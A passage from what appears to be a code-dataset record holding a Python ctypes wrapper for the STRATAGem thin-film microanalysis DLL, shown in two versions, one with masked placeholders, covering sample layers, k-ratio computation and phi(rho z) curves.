if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n _energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,\n step)\n kratio = kratios[experiment][-1]\n if kratio < 0:\n logger.warn(\n 'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'\n )\n _energies, kratios = self.compute_kratio_vs_energy(\n energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n output.setdefault(experiment, kratio)\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-4": "<mask token>\nimport os\nimport ctypes as c\nimport logging\nlogger = logging.getLogger(__name__)\nfrom operator import attrgetter\nimport random\nimport string\nimport functools\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n\n\n class winreg:\n HKEY_CURRENT_USER = None\n\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\nfrom stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF\nfrom stratagemtools.experiment import Experiment, LINE_KA\nfrom stratagemtools.element_properties import atomic_mass_kg_mol, mass_density_kg_m3\n_REGISTRY_KEY = 'Software\\\\SAMx\\\\Stratagem\\\\Configuration'\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\nPRZMODE_XPP = 0\n<mask token>\nPRZMODE_PAP = 1\n<mask token>\nPRZMODE_GAU = 2\n<mask token>\nFLUORESCENCE_NONE = 0\n<mask token>\nFLUORESCENCE_LINE = 1\n<mask token>\nFLUORESCENCE_LINE_CONT = 2\n<mask token>\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\n\nclass StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\n\ndef _check_key(method):\n\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. ``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n logger.debug('StObjectNew(key, %r, %i)', not standard, 0)\n if not self._lib.StObjectNew(key, bnormal_, iniflags_):\n self._raise_error('Cannot create object')\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear()\n self._substrate = None\n self._experiments.clear()\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n for layer in self._layers:\n sample.add_layer(layer.composition, layer.thickness_m, layer.\n mass_thickness_kg_m2, layer.density_kg_m3)\n return sample\n sample = property(get_sample, set_sample, doc='Property to set/get sample')\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error('Cannot set geometry parameters')\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(\n tilt_), c.byref(azimuth_)):\n self._raise_error('Cannot get geometry parameters')\n return toa_.value, tilt_.value, azimuth_.value\n geometry = property(get_geometry, doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n prz_mode = property(get_prz_mode, set_prz_mode, doc=\n 'Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n fluorescence = property(get_fluorescence, set_fluorescence, doc=\n 'Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n standard_directory = property(get_standard_directory,\n set_standard_directory, doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. \n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n energy_ = c.c_double(energy_high_eV / 1000.0)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))\n self._lib.StSetMaxHV(energy_)\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error('Cannot compute k-ratio vs energy')\n energies = []\n kratios = {}\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1000.0) / step\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,\n bHV_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n energies.append(hv)\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n _energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,\n step)\n kratio = kratios[experiment][-1]\n if kratio < 0:\n logger.warn(\n 'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'\n )\n _energies, kratios = self.compute_kratio_vs_energy(\n energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n output.setdefault(experiment, kratio)\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho 